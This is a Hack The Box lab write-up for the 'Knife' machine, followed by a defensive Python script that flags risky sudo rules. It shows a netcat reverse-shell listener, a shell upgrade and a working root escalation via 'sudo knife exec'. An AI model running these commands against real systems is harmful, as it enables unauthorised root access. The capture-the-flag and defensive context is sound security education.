IT and security stuff

HTB – Knife Writeup

neoh  main  ~/HTB/knife  sudo nmap -sSCV -p- -T4 10.10.10.242 -oN nmap.md 
[sudo] password for neoh: 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 21:10 EST
Nmap scan report for 10.10.10.242
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds

Nmap reveals ssh on port 22 and a website on port 80.

It took me a couple of seconds to find a vulnerability on this website. In the response headers we can see X-Powered-By: PHP/8.1.0-dev.

I found a nice exploit on GitHub that will provide a reverse shell. Let’s start a listener.

 neoh  main  ~  nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.242 52250
bash: cannot set terminal process group (969): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
james@knife:/$ export TERM=xterm
export TERM=xterm
james@knife:/$

Time for escalation. Enumeration didn’t take long 😉

james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

This should be fairly easy!

james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
# whoami
whoami
root

Done!!! Rooted!
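For defenders, the sudo rule above amounts to full root access, because knife exec runs Ruby code. The following Python check is an added example, not part of the original writeup: it parses `sudo -l` output and flags rules that grant a program able to run arbitrary code. The EXEC_CAPABLE list, the function names and the second sample rule are assumptions made for illustration.

```python
import os
import re

# Illustrative, non-exhaustive set (an assumption of this example) of programs
# that can run arbitrary code; knife is listed because `knife exec` runs Ruby.
EXEC_CAPABLE = {"knife", "ruby", "python3", "perl", "bash", "sh", "vim", "find", "awk"}

# A rule line from `sudo -l`: "    (runas) [TAG: ...] cmd[, cmd ...]"
RULE_RE = re.compile(r"^\s+\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample: the rule from the writeup plus one made-up harmless rule.
SAMPLE = """\
Matching Defaults entries for james on knife:
    env_reset, mail_badpass

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) /usr/bin/uptime
"""


def parse_sudo_l(text):
    """Return one dict (runas, nopasswd, command) per command in the rule list."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True  # lines before this are Defaults, not rules
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        for cmd in re.split(r"(?<!\\),\s*", m.group("cmds")):
            if cmd.strip():
                rules.append({"runas": m.group("runas"),
                              "nopasswd": "NOPASSWD" in tags,
                              "command": cmd.strip()})
    return rules


def risky_rules(rules):
    """Rules equivalent to unrestricted access to the runas account."""
    return [r for r in rules
            if r["command"] == "ALL"
            or os.path.basename(r["command"].split()[0]) in EXEC_CAPABLE]


if __name__ == "__main__":
    for r in risky_rules(parse_sudo_l(SAMPLE)):
        print(f"({r['runas']}) {r['command']} nopasswd={r['nopasswd']}")
```

A flagged rule is better replaced with a wrapper script that performs only the one administrative task the user needs.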
